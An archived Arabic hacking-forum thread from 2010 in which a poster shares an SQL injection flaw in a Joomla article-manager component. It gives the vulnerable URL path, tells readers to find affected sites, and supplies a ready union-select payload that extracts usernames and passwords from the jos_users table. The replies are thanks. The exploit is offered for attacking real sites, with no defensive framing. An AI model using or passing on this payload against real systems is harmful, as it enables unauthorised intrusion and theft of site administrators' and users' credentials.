:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   ثغرة في سكريبت جمولة (http://www.vbspiders.com/vb/t23804.html)

M!M0 01-15-2010 01:56 AM
ثغرة في سكريبت جمولة
 
السلام عليكم ورحمة الله وبركاته

جبت لكم اليوم ثغرة في سكريبت جمولة

الثغرة من نوع SQL INJECTION

الذي يعشقها الكثير

نبدأ

دورك البحث عن المواقع المصابة

كود PHP:
index.php?option=com_articlemanager&Itemid=349&task=display&artid
طريقة الإستغلال

كود PHP:
null/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rix,5,6,7,8/**/from/**/jos_users-- 
الثغرة من إكتشاف

FL0RiX


إن شاء الله تستفيدوا

موفقين بإذن الله ...

az360 01-15-2010 02:37 AM
بارك الله فيك ،،/

Dr.NaNo 01-15-2010 09:44 AM
بارك الله فيك أخي على الثغرة بس انا مريت عليها اول بس مافهمت كيف طريقة الاستغلال [ صعب ، شوي ] :)


تحياتي لكـ ياغالي :)

KaLa$nikoV 01-15-2010 05:54 PM
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

~ْ R.ZoRo ~ْ 01-15-2010 11:08 PM
كبير تسلم على الثغرة


الساعة الآن 01:59 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0